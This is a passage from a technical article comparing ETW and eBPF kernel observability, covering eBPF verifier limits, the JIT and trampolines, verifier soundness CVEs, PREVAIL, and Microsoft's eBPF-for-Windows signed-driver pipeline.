    for (const [key, count] of percpu_map.iter(cpu)) {
      merged[key] = (merged[key] || 0) + count;
    }
  }
  render_power_of_two_histogram(merged);
}
`}&lt;/p&gt;
&lt;p&gt;The kernel-side per-event cost is a few instructions plus a non-atomic increment. The user-space cost is paid once, at print time. The wire between kernel and user carries one batch read of the entire per-CPU map. ETW&apos;s equivalent would carry every single &lt;code&gt;vfs_read&lt;/code&gt; event in full.&lt;/p&gt;
&lt;h3&gt;The instruction-count and complexity limits&lt;/h3&gt;
&lt;p&gt;Two distinct limits constrain what the verifier will accept. The constants are easy to confuse, and earlier drafts of this article confused them. The correct distinction comes straight from the kernel headers.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;BPF_MAXINSNS&lt;/code&gt; is defined as 4096 in &lt;code&gt;include/uapi/linux/bpf_common.h&lt;/code&gt;. This is the maximum number of bytecode instructions per program for unprivileged callers. A program longer than 4096 instructions is rejected at load time regardless of what the verifier finds.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;BPF_COMPLEXITY_LIMIT_INSNS&lt;/code&gt; is defined as 1,000,000 in &lt;code&gt;kernel/bpf/verifier.c&lt;/code&gt;. This is the maximum number of &lt;em&gt;explored states&lt;/em&gt; the verifier will visit during its symbolic execution. It applies to privileged callers with &lt;code&gt;CAP_BPF&lt;/code&gt;, who are allowed to load larger programs but still bound the cost of verifying them.The two limits answer different questions. &lt;code&gt;BPF_MAXINSNS = 4096&lt;/code&gt; bounds the &lt;em&gt;size&lt;/em&gt; of an unprivileged program. &lt;code&gt;BPF_COMPLEXITY_LIMIT_INSNS = 1,000,000&lt;/code&gt; bounds the &lt;em&gt;cost&lt;/em&gt; of verification for privileged programs. Conflating them is a common error: production EDRs run with &lt;code&gt;CAP_BPF&lt;/code&gt; plus &lt;code&gt;CAP_PERFMON&lt;/code&gt; or root and load programs much longer than 4096 instructions, but the verifier&apos;s exploration is still bounded.&lt;/p&gt;
&lt;p&gt;Linux 5.16 (March 2022) [@kernel-org-bpf-indexhtml] made &lt;code&gt;kernel.unprivileged_bpf_disabled=1&lt;/code&gt; the default.The change followed a series of verifier soundness CVEs, including CVE-2020-8835 and CVE-2021-3490, that were exploitable from unprivileged user space. Production EDRs run with &lt;code&gt;CAP_BPF&lt;/code&gt; plus &lt;code&gt;CAP_PERFMON&lt;/code&gt; or full root; the unprivileged path is reserved for sandboxed workloads where the kernel team has weighed the risk.&lt;/p&gt;
&lt;h3&gt;The JIT and the trampoline&lt;/h3&gt;
&lt;p&gt;Brendan Gregg&apos;s &lt;em&gt;BPF Performance Tools&lt;/em&gt; [@brendangregg-com-tools-bookhtml], published by Addison-Wesley in 2019 (ISBN-13 9780136554820 [@pearson-com-p200000007897-9780136554820]), reports a 10x to 12x speedup of the JIT over the interpreter on x86-64. The number is qualitative -- the workload, the kernel version, and the program shape all matter -- but the order of magnitude is consistent across kernel docs and measurements. The JIT is what makes eBPF practically usable inside hot kernel paths.&lt;/p&gt;
&lt;p&gt;A second performance refinement landed in 2019 with the BPF trampoline patch series. Starovoitov&apos;s v1 cover letter [@lore-kernel-org-1-astkernelorg] introduced &lt;code&gt;fentry&lt;/code&gt; and &lt;code&gt;fexit&lt;/code&gt; -- BPF program attach points that use a tiny JIT-emitted dispatcher to call the attached programs directly, rather than relying on kprobe&apos;s &lt;code&gt;int3&lt;/code&gt; trap mechanism. The framing is worth quoting:&lt;/p&gt;

Unlike k[ret]probe there is practically zero overhead to call a set of BPF programs before or after kernel function. -- Alexei Starovoitov, BPF trampoline cover letter [@lore-kernel-org-1-astkernelorg]
&lt;p&gt;The v3 patch in the same series [@lore-kernel-org-4-astkernelorg] explains the structural reason: &lt;em&gt;&quot;To avoid the high cost of retpoline the attached BPF programs are called directly.&quot;&lt;/em&gt; kprobe goes through an indirect-jump dispatch, which on Spectre-mitigated kernels pays a retpoline penalty per call. The BPF trampoline replaces the indirect jump with a direct call patched in at attach time, eliminating that penalty entirely. The qualitative result is &quot;practically zero overhead&quot; relative to the function call itself. The exact numbers vary; the architectural reason does not.&lt;/p&gt;
&lt;h3&gt;Tail calls&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;bpf_tail_call(ctx, &amp;amp;prog_array, index)&lt;/code&gt; is a helper that, when the &lt;code&gt;prog_array&lt;/code&gt; slot at &lt;code&gt;index&lt;/code&gt; contains a loaded program, replaces the current program&apos;s execution context with the target program&apos;s. The architecture is documented in the Cilium BPF architecture reference [@docs-cilium-io-bpf-architecture], which describes the 33-call nesting ceiling: &lt;em&gt;&quot;This, too, comes with an upper nesting limit of 33 calls, and is usually used to decouple parts of the program logic, for example, into stages.&quot;&lt;/em&gt; The 33-call cap bounds the worst-case execution time of a chain that the verifier cannot symbolically follow (the destination is a runtime-resolved map slot, not a static call target). We will return to the security implications of tail calls in section 7.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; eBPF inverts the observability model. ETW asks the kernel &quot;what happened?&quot; eBPF asks the kernel &quot;compute this and tell me the answer.&quot; The asymmetry is the reason a histogram of &lt;code&gt;vfs_read&lt;/code&gt; lengths costs nothing on the wire under eBPF, and costs a fully formatted event per call under ETW.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;eBPF is strictly more powerful than ETW: programmable filter, programmable aggregation, hooks everywhere. But that power has a cost that does not exist in ETW at all. The verifier.&lt;/p&gt;
&lt;h2&gt;5. The Verifier: Where Mathematics Meets the Kernel&lt;/h2&gt;
&lt;p&gt;May 2023. NIST publishes CVE-2023-2163 [@nvd-nist-gov-2023-2163]. The advisory describes the eBPF verifier in every Linux kernel since 5.4 quietly accepting programs it should have rejected: &lt;em&gt;&quot;Incorrect verifier pruning in BPF in Linux Kernel &amp;gt;=5.4 leads to unsafe code paths being incorrectly marked as safe, resulting in arbitrary read/write in kernel memory, lateral privilege escalation, and container escape.&quot;&lt;/em&gt; The fix was a small correction to a state-pruning heuristic. The lesson is bigger than the patch: &lt;em&gt;no in-kernel verifier for a Turing-complete instruction set can be simultaneously sound, complete, and decidable.&lt;/em&gt; That is not a bug. It is a theorem.&lt;/p&gt;
&lt;h3&gt;Rice&apos;s theorem in the kernel&lt;/h3&gt;
&lt;p&gt;Alan Turing proved in 1936 that the halting problem is undecidable: no algorithm can decide, for every possible program, whether that program halts on every input. Henry Gordon Rice extended the result in 1953: any &lt;em&gt;non-trivial semantic property&lt;/em&gt; of a program -- including memory safety, type safety, and bounded resource use -- is undecidable for the general case. The verifier has to decide a non-trivial semantic property: &lt;em&gt;does this eBPF program access kernel memory only through valid pointers, with valid offsets, and terminate?&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;It cannot. Not in general. The verifier has to give up at least one of three properties:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Soundness&lt;/em&gt; -- never accept an unsafe program.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Completeness&lt;/em&gt; -- never reject a safe program.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Scalability&lt;/em&gt; -- run in polynomial time on real programs.&lt;/li&gt;
&lt;/ul&gt;

The halting problem is about a single property: termination. Rice&apos;s theorem generalizes the result to all non-trivial extensional properties -- any property that depends on what a program computes rather than how it is written. Memory safety on a Turing-complete instruction set is a non-trivial extensional property: there exist programs that are safe and programs that are unsafe. Rice&apos;s theorem says no decision procedure can correctly classify every program. Any real verifier must therefore be an *approximation* -- either it sometimes rejects safe programs (loss of completeness), sometimes accepts unsafe ones (loss of soundness), or runs out of resources on hard inputs (loss of scalability).
&lt;p&gt;Jia and colleagues at HotOS 2023 [@sigops-org-papers-jiapdf] formalized this trilemma for in-kernel verifiers. The paper&apos;s title is the thesis: &lt;em&gt;&quot;Kernel Extension Verification Is Untenable.&quot;&lt;/em&gt; The authors argue that any verifier for a kernel extension language with the expressiveness of eBPF must trade off at least one of the three properties, and that real verifiers ship by trading all three approximately.&lt;/p&gt;

Kernel Extension Verification Is Untenable. -- Jia et al., HotOS 2023, `sigops.org/s/conferences/hotos/2023/papers/jia.pdf` [@sigops-org-papers-jiapdf]

flowchart TD
    A[Soundness -- never accept -- unsafe programs]
    B[Completeness -- never reject -- safe programs]
    C[Scalability -- polynomial time -- on real programs]
    A --- B
    B --- C
    C --- A
    X[&quot;No verifier can have -- all three on a -- Turing-complete ISA&quot;]
    A -.-&amp;gt; X
    B -.-&amp;gt; X
    C -.-&amp;gt; X
&lt;p&gt;The Linux verifier ships with all three approximately. PREVAIL, the verifier used by eBPF-for-Windows, ships with stronger soundness and weaker completeness. The two designs occupy different points on the triangle, and the difference shows up in production.&lt;/p&gt;
&lt;h3&gt;The Linux verifier&lt;/h3&gt;
&lt;p&gt;The kernel verifier documentation [@docs-kernel-org-bpf-verifierhtml] describes the algorithm:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;The safety of the eBPF program is determined in two steps. First step does DAG check to disallow loops and other CFG validation. ... Second step starts from the first insn and descends all possible paths. It simulates execution of every insn and observes the state change of registers and stack.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The state the verifier tracks is a register-state lattice. Each register holds a type from a finite set: &lt;code&gt;PTR_TO_CTX&lt;/code&gt; (a pointer to the program&apos;s context argument), &lt;code&gt;PTR_TO_MAP_VALUE&lt;/code&gt; (a pointer into a map entry), &lt;code&gt;PTR_TO_MAP_VALUE_OR_NULL&lt;/code&gt; (the return type of &lt;code&gt;bpf_map_lookup_elem&lt;/code&gt;, which can be null), &lt;code&gt;SCALAR_VALUE&lt;/code&gt; (an integer with min/max range), and so on. Each register also has a min/max range that tightens at every operation.&lt;/p&gt;

The kernel-side static analyzer that proves termination and memory safety of every eBPF program before load. The Linux verifier is documented at `docs.kernel.org/bpf/verifier.html` [@docs-kernel-org-bpf-verifierhtml]. It uses a register-state lattice plus min/max range tracking and explores all reachable program paths with state pruning to keep the cost manageable.
&lt;p&gt;Consider the canonical pattern: look up a map value, check for null, dereference. Every eBPF tracing program does some version of this.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;struct value *v = bpf_map_lookup_elem(&amp;amp;map, &amp;amp;key);   // r0 := PTR_TO_MAP_VALUE_OR_NULL
if (!v) return 0;                                    // branch on r0 == 0
return v-&amp;gt;field;                                     // deref r0 + offset(field)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The verifier traces both branches. On the taken branch (&lt;code&gt;r0 == 0&lt;/code&gt;), the type stays nullable, and the program returns. On the not-taken branch, the verifier refines the type from &lt;code&gt;PTR_TO_MAP_VALUE_OR_NULL&lt;/code&gt; to &lt;code&gt;PTR_TO_MAP_VALUE&lt;/code&gt; -- the null qualifier is gone, the dereference is bounds-checked against the map&apos;s value size, and the program is accepted.&lt;/p&gt;
&lt;p&gt;This refinement is exactly the thing that broke in CVE-2023-2163. The bug was not in the dereference logic; it was in the &lt;em&gt;state pruning&lt;/em&gt; that keeps the verifier&apos;s exploration tractable. Once the verifier has visited a program point with a given abstract state, it prunes subsequent visits from different predecessors with &quot;the same&quot; state. CVE-2023-2163 was a case where the pruner&apos;s notion of &quot;the same state&quot; was &lt;em&gt;narrower&lt;/em&gt; than the predecessor&apos;s true state. The verifier accepted a program in which a register&apos;s true type at a join point did not match the type the verifier had pruned against. The program ran with hidden type confusion. Kernel arbitrary read/write followed.&lt;/p&gt;
&lt;h3&gt;PREVAIL, the abstract-interpretation verifier&lt;/h3&gt;
&lt;p&gt;PREVAIL [@github-com-ebpf-verifier], published by Gershuni and colleagues at PLDI 2019 [@vbpf-github-io-prevail-paperpdf], takes a structurally different approach. Where Linux&apos;s verifier is a heuristic abstract interpreter with a discrete type lattice, PREVAIL uses &lt;em&gt;numerical abstract interpretation&lt;/em&gt; over the &lt;em&gt;zone domain&lt;/em&gt; plus intervals.&lt;/p&gt;

A general framework for static analysis, introduced by Patrick and Radhia Cousot in 1977. The analyzer computes over an *abstract domain* -- intervals, zones, polyhedra, octagons -- rather than concrete program states. A safe abstract operation must over-approximate every possible concrete behavior. The soundness of the analysis reduces to the soundness of the abstract domain operations, which can be proved once and reused.
&lt;p&gt;In the zone domain, the abstract state can express &lt;em&gt;relational&lt;/em&gt; constraints between registers and memory base addresses -- not just &quot;register &lt;code&gt;r0&lt;/code&gt; is in &lt;code&gt;[base, base + size)&lt;/code&gt;&quot; but &quot;&lt;code&gt;r0 - map_base&lt;/code&gt; is in &lt;code&gt;[0, value_size)&lt;/code&gt;.&quot; That extra expressiveness is what lets PREVAIL prove pointer-arithmetic safety more directly than the Linux verifier&apos;s case enumeration. Walking the same null-check program:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Program point&lt;/th&gt;
&lt;th&gt;Linux verifier (register lattice)&lt;/th&gt;
&lt;th&gt;PREVAIL (zone domain)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;After &lt;code&gt;bpf_map_lookup_elem&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PTR_TO_MAP_VALUE_OR_NULL&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;r0 in {0} U [base, base+sz)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Taken branch (r0 == 0)&lt;/td&gt;
&lt;td&gt;refined to NULL&lt;/td&gt;
&lt;td&gt;r0 = 0 (equality)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Not-taken branch&lt;/td&gt;
&lt;td&gt;&lt;code&gt;PTR_TO_MAP_VALUE&lt;/code&gt; (qualifier dropped)&lt;/td&gt;
&lt;td&gt;r0 - base in [0, sz)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;At deref &lt;code&gt;v-&amp;gt;field&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;bounds-checked deref&lt;/td&gt;
&lt;td&gt;r0 - base in [off, off+access)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Both verifiers accept the program. The difference is in the proof strategy. Linux&apos;s verifier reasons case-by-case over a finite lattice; PREVAIL reasons numerically over an abstract domain whose soundness is proved once and reused. The PREVAIL paper (Gershuni et al., PLDI 2019) [@vbpf-github-io-prevail-paperpdf] showed that the zone-domain approach is sound and runs in polynomial time per fixed abstract domain.&lt;/p&gt;

flowchart LR
    A[&quot;r0 := bpf_map_lookup_elem&quot;]
    B{&quot;r0 == 0?&quot;}
    C[&quot;return 0&quot;]
    D[&quot;return r0-&amp;gt;field&quot;]
    A --&amp;gt; B
    B -- yes --&amp;gt; C
    B -- no --&amp;gt; D
    A -. &quot;Linux: PTR_TO_MAP_VALUE_OR_NULL -- PREVAIL: r0 in {0} U [base, base+sz)&quot; .-&amp;gt; A
    C -. &quot;Linux: NULL -- PREVAIL: r0 = 0&quot; .-&amp;gt; C
    D -. &quot;Linux: PTR_TO_MAP_VALUE -- PREVAIL: r0 - base in [0, sz)&quot; .-&amp;gt; D
&lt;p&gt;The trade-off is concrete. PREVAIL accepts a broader class of programs the Linux verifier rejects (some bounded loops, some longer programs), and rejects others the Linux verifier accepts (Linux&apos;s heuristic pruning is more aggressive than zone-domain reasoning in some patterns). The contrast is a &lt;em&gt;trade&lt;/em&gt;, not a strict ordering. Each verifier is sound with respect to its own abstract domain. The Linux verifier&apos;s CVE history is what happens when the domain itself is implemented heuristically rather than from a once-and-for-all soundness proof. The work of Paul Chaignon [@pchaigno-github-io-ebpf-verifierhtml] walks through the architectural differences in more detail.&lt;/p&gt;
&lt;h3&gt;Four CVEs, one pattern&lt;/h3&gt;
&lt;p&gt;The Linux verifier has shipped four widely-disclosed soundness bugs, each one a case where the verifier accepted a program it should have rejected.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;CVE&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Subsystem at fault&lt;/th&gt;
&lt;th&gt;Class&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;CVE-2020-8835 [@nvd-nist-gov-2020-8835]&lt;/td&gt;
&lt;td&gt;2020&lt;/td&gt;
&lt;td&gt;32-bit register bounds tracking&lt;/td&gt;
&lt;td&gt;Out-of-bounds read/write&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2021-3490 [@nvd-nist-gov-2021-3490]&lt;/td&gt;
&lt;td&gt;2021&lt;/td&gt;
&lt;td&gt;ALU32 bitwise-op bounds tracking&lt;/td&gt;
&lt;td&gt;Out-of-bounds R/W, arbitrary RCE&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2022-23222 [@nvd-nist-gov-2022-23222]&lt;/td&gt;
&lt;td&gt;2022&lt;/td&gt;
&lt;td&gt;&lt;code&gt;*_OR_NULL&lt;/code&gt; type-state tracking&lt;/td&gt;
&lt;td&gt;Local privilege escalation via type confusion&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2023-2163 [@nvd-nist-gov-2023-2163]&lt;/td&gt;
&lt;td&gt;2023&lt;/td&gt;
&lt;td&gt;Branch-pruning logic&lt;/td&gt;
&lt;td&gt;Arbitrary kernel R/W&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The CVE-2020-8835 NVD entry describes a flaw where the verifier &lt;em&gt;&quot;did not properly restrict the register bounds for 32-bit operations, leading to out-of-bounds reads and writes in kernel memory.&quot;&lt;/em&gt; CVE-2021-3490, also reported on the NVD, identifies the same class of bug in the bitwise-operation paths. The CVE-2022-23222 record is tracked across the SUSE bug [@bugzilla-suse-com-showbugcgi], Debian DSA-5050 [@debian-org-dsa-5050], and the openwall oss-security disclosure thread [@openwall-com-13-1].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; All four CVEs are the same shape: the verifier&apos;s abstract state at some program point was &lt;em&gt;narrower&lt;/em&gt; than the program&apos;s true reachable state, so the verifier proved a property that did not hold. Each fix tightened the abstract operation that introduced the narrowing -- range-tracking for the 2020 and 2021 bugs, type-state for 2022, branch pruning for 2023. None of the fixes were &quot;fix the runtime&quot;; they were all &quot;fix the static analysis.&quot; That is exactly the shape Rice&apos;s theorem predicts: a heuristic abstract interpreter that occasionally drops information at a join point.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The verifier is a research-grade static analyzer running as kernel code. When it gets the abstract domain wrong, the safety guarantee is a CVE. ETW does not have this failure mode because ETW does not run user-supplied code in the kernel.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;ETW has driver signing as its safety mechanism. eBPF has the verifier. Microsoft&apos;s eBPF-for-Windows project asked an interesting question: &lt;em&gt;what if you want both?&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;6. eBPF for Windows: The Convergence&lt;/h2&gt;
&lt;p&gt;On May 10, 2021, Dave Thaler of Microsoft published a blog post announcing a new project. The opening line is the kind of announcement that sounds modest and is not:&lt;/p&gt;

&quot;Today we are excited to announce a new Microsoft open source project to make eBPF work on Windows 10 and Windows Server 2016 and later.&quot; -- Dave Thaler, &quot;Making eBPF work on Windows&quot; [@cloudblogs-microsoft-com-on-windows], Microsoft Open Source Blog, May 2021
&lt;p&gt;The promise was a near-source-compatible eBPF surface on NT, so that programs and toolchains written for Linux eBPF -- libbpf, bpftool, BCC, clang &lt;code&gt;-target bpf&lt;/code&gt; -- would work on Windows with minimal change. The architectural surprise, visible only once you read the design docs, is that the Linux design does not port directly. The Windows trust model is different. The Windows code-integrity story is different. The choices Microsoft made reveal which parts of eBPF &lt;em&gt;are&lt;/em&gt; genuinely portable and which parts are deeply Linux-shaped.&lt;/p&gt;
&lt;h3&gt;Three execution modes&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;microsoft/ebpf-for-windows&lt;/code&gt; README [@github-com-for-windows] decomposes the runtime into three modes:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;em&gt;Native eBPF program (preferred, HVCI-compatible).&lt;/em&gt; PREVAIL verifies the bytecode in user mode. On success, the &lt;code&gt;bpf2c&lt;/code&gt; [@github-com-bpf2ctests-expected] tool transliterates each verified BPF instruction to equivalent C, MSVC compiles the C, and the result is a signed &lt;code&gt;.sys&lt;/code&gt; kernel driver. The signed driver is what gets loaded into the kernel.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;JIT compiler.&lt;/em&gt; A user-mode service (&lt;code&gt;eBPFSvc.exe&lt;/code&gt;) calls the uBPF [@github-com-iovisor-ubpf] JIT to produce x64 or ARM64 native code, loaded into the kernel-mode execution context. Disabled on HVCI hosts because dynamic code generation cannot be SiPolicy-signed.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Interpreter.&lt;/em&gt; uBPF&apos;s interpreter, debug-only.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The native mode is the architecturally interesting one. It treats eBPF bytecode as a &lt;em&gt;source language&lt;/em&gt; for a signed-driver compile, not as a target for a kernel-mode JIT. The choice is forced by Windows&apos; kernel-mode security model.&lt;/p&gt;

A Windows feature that uses the hypervisor to enforce that only signed code runs in kernel mode. With HVCI on, the kernel will refuse to execute any page that does not match a Code Integrity policy signature. Dynamic code generation -- the kind a JIT does -- is impossible on an HVCI host unless the JIT itself is privileged to bless the pages it produces.
&lt;h3&gt;bpf2c: the literal transliterator&lt;/h3&gt;
&lt;p&gt;The thing that makes the native pipeline work is &lt;code&gt;bpf2c&lt;/code&gt;. It takes verified eBPF bytecode and emits portable C that any modern compiler can build into a kernel driver. The transliteration is one bytecode instruction per C statement. A concrete excerpt from &lt;code&gt;droppacket_raw.c&lt;/code&gt; [@raw-githubusercontent-com-expected-droppacketrawc], the expected output for the XDP-class &lt;code&gt;droppacket.c&lt;/code&gt; [@github-com-sample-droppacketc] sample, shows the shape:&lt;/p&gt;
&lt;p&gt;{`
// Excerpt from microsoft/ebpf-for-windows
//   tests/bpf2c_tests/expected/droppacket_raw.c
// One verified BPF instruction maps to one C statement.&lt;/p&gt;
&lt;p&gt;#pragma code_seg(push, &quot;xdp&quot;)
static uint64_t
DropPacket(void* context, const program_runtime_context_t* runtime_context)
{
  uint64_t stack[(UBPF_STACK_SIZE + 7) / 8];
  register uint64_t r0 = 0;
  register uint64_t r1 = 0;
  // ... r2 .. r6, r10 declarations ...&lt;/p&gt;
&lt;p&gt;  // EBPF_OP_MOV64_REG pc=0 dst=r6 src=r1 offset=0 imm=0
  r6 = r1;
  // EBPF_OP_MOV64_IMM pc=1 dst=r1 src=r0 offset=0 imm=0
  r1 = IMMEDIATE(0);
  // EBPF_OP_STXDW pc=2 dst=r10 src=r1 offset=-8 imm=0
  WRITE_ONCE_64(r10, (uint64_t)r1, OFFSET(-8));&lt;/p&gt;
&lt;p&gt;  // ... one C statement per verified BPF instruction ...&lt;/p&gt;
&lt;p&gt;  r0 = runtime_context-&amp;gt;helper_data[0].address(r1, r2, r3, r4, r5, context);
}
`}&lt;/p&gt;

The eBPF-for-Windows transliterator from verified BPF bytecode to portable C suitable for MSVC compilation. The output is a signed-driver source file, one C statement per BPF instruction, that can be compiled and signed through the same pipeline as any other kernel driver. The golden test corpus lives at `microsoft/ebpf-for-windows/tests/bpf2c_tests/expected` [@github-com-bpf2ctests-expected].
&lt;p&gt;Four things stand out in the excerpt. &lt;em&gt;One BPF instruction maps to one C statement&lt;/em&gt;; the &lt;code&gt;// EBPF_OP_*&lt;/code&gt; comments name the opcode, and the line below it is the equivalent C. The eBPF VM&apos;s eleven registers become eleven C &lt;code&gt;uint64_t&lt;/code&gt; locals; MSVC&apos;s optimizer assigns them to native registers in the final &lt;code&gt;.sys&lt;/code&gt;. The &lt;code&gt;#pragma code_seg(push, &quot;xdp&quot;)&lt;/code&gt; directive names the program section the same way &lt;code&gt;SEC(&quot;xdp&quot;)&lt;/code&gt; does on Linux. And helper calls dispatch through a runtime table -- &lt;code&gt;runtime_context-&amp;gt;helper_data[0].address(...)&lt;/code&gt; -- so the signed driver remains portable across helper-ABI changes.&lt;/p&gt;
&lt;p&gt;The result is a kernel module that is a signed driver in every Windows sense of the term: HVCI checks pass, Kernel Mode Code Integrity (KMCI) [@learn-microsoft-com-downloads-sysmon] is satisfied, the Authenticode chain validates. eBPF-for-Windows native mode does not invent a new in-kernel trust boundary. It composes with the one Windows already has.&lt;/p&gt;

flowchart LR
    A[&quot;Restricted C source&quot;]
    B[&quot;clang -target bpf&quot;]
    C[&quot;BPF bytecode&quot;]
    D[&quot;PREVAIL verifier -- (user mode)&quot;]
    E[&quot;bpf2c -- transliterator&quot;]
    F[&quot;Portable C&quot;]
    G[&quot;MSVC compile&quot;]
    H[&quot;Signed .sys driver&quot;]
    I[&quot;Windows kernel -- (HVCI / KMCI)&quot;]
    A --&amp;gt; B --&amp;gt; C --&amp;gt; D --&amp;gt; E --&amp;gt; F --&amp;gt; G --&amp;gt; H --&amp;gt; I
&lt;h3&gt;The verifier moved&lt;/h3&gt;
&lt;p&gt;The most consequential architectural choice in eBPF-for-Windows is not visible in the binary. PREVAIL does not run inside the kernel. It runs inside the user-mode &lt;code&gt;eBPFSvc.exe&lt;/code&gt; service, which orchestrates verification and the subsequent compile-and-sign pipeline. The kernel never sees an unverified BPF program. By the time anything enters the kernel, it is either a signed driver (native mode) or a JIT-produced buffer that has already passed verification in user space (JIT mode, on non-HVCI hosts).&lt;/p&gt;
&lt;p&gt;This is a deliberate divergence from Linux. Linux runs its verifier inside the kernel because the kernel is the only place that can prevent unprivileged user space from loading unsafe programs. Windows can move the verifier out of the kernel because the kernel-mode trust boundary -- &lt;em&gt;the thing that can run&lt;/em&gt; -- is already protected by code signing. The verifier becomes a &lt;em&gt;correctness&lt;/em&gt; check rather than a &lt;em&gt;safety&lt;/em&gt; check at the kernel boundary; safety at the boundary is enforced by HVCI.&lt;/p&gt;
&lt;h3&gt;Hook coverage as of 2026&lt;/h3&gt;
&lt;p&gt;The hook surface on Windows is narrower than Linux&apos;s. As of 2026, eBPF-for-Windows exposes XDP-class network hooks, BIND, SOCK_OPS, SOCK_ADDR, and process-creation and process-exit hooks via Windows Filtering Platform callouts plus a process hook surface. There is no full kprobe surface. There are no LSM-equivalent hooks. The project README [@github-com-for-windows] labels itself &quot;work-in-progress.&quot; The networking-subset claim in this article is not marketing softening; it is the actual hook list.&lt;/p&gt;

The naive model of cross-OS eBPF says: same bytecode runtime, runs on both kernels. The actual model is more subtle and more interesting.&lt;p&gt;The bytecode is portable because both verifiers accept the same instruction encoding, now standardized at IETF as RFC 9669 [@rfc-editor-org-rfc-rfc9669html]. The verifier is portable because PREVAIL is an abstract interpreter that does not depend on Linux-specific kernel data structures. The &lt;em&gt;runtime&lt;/em&gt; is not portable: Linux runs verified bytecode through its in-kernel JIT; Windows transliterates verified bytecode to C and compiles it into a signed driver.&lt;/p&gt;
&lt;p&gt;So the cross-platform abstraction is the verifier, not the runtime. PREVAIL is the contract; each OS lifts verified bytecode into its own trust model. Linux trusts the verifier&apos;s output enough to JIT it in kernel mode; Windows distrusts in-kernel dynamic code by policy and lifts the verified bytecode out through a signed-driver compile. The portability boundary moved from &quot;same VM&quot; to &quot;same static analysis,&quot; and that is the architectural insight that makes the project work.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The runtime is not the cross-platform abstraction. The verifier is. PREVAIL is the contract; each OS lifts verified bytecode into its own trust model -- in-kernel JIT on Linux, signed-driver compile on Windows. eBPF-for-Windows is not &quot;same kernel hook, different OS&quot;; it is &quot;same bytecode contract, different OS-specific lifting.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Cross-OS eBPF works for the networking subset today. The general kernel observability case -- arbitrary kprobes, full LSM hooks, deep process introspection -- is still Linux-only because the &lt;em&gt;hooks themselves&lt;/em&gt; are Linux-internal. eBPF-for-Windows is a real convergence, but it is a &lt;em&gt;subset&lt;/em&gt; convergence. Section 7 zooms out and compares the two designs across the full set of dimensions practitioners actually use to choose.&lt;/p&gt;
&lt;h2&gt;7. Head-to-Head: Performance and Trust Models&lt;/h2&gt;
&lt;p&gt;Two designs. One emits, one computes. Practitioners need to know what each one costs, where each one&apos;s edges cut, and what attack classes each design enables. The right form for that comparison is a table.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;ETW&lt;/th&gt;
&lt;th&gt;Linux eBPF&lt;/th&gt;
&lt;th&gt;eBPF for Windows&lt;/th&gt;
&lt;th&gt;DTrace&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;In-kernel filter language&lt;/td&gt;
&lt;td&gt;None (level + keyword mask only)&lt;/td&gt;
&lt;td&gt;Verified bytecode&lt;/td&gt;
&lt;td&gt;Verified bytecode&lt;/td&gt;
&lt;td&gt;D scripting language&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;In-kernel aggregation&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Maps (per-CPU and shared)&lt;/td&gt;
&lt;td&gt;Maps&lt;/td&gt;
&lt;td&gt;Aggregations primitive&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
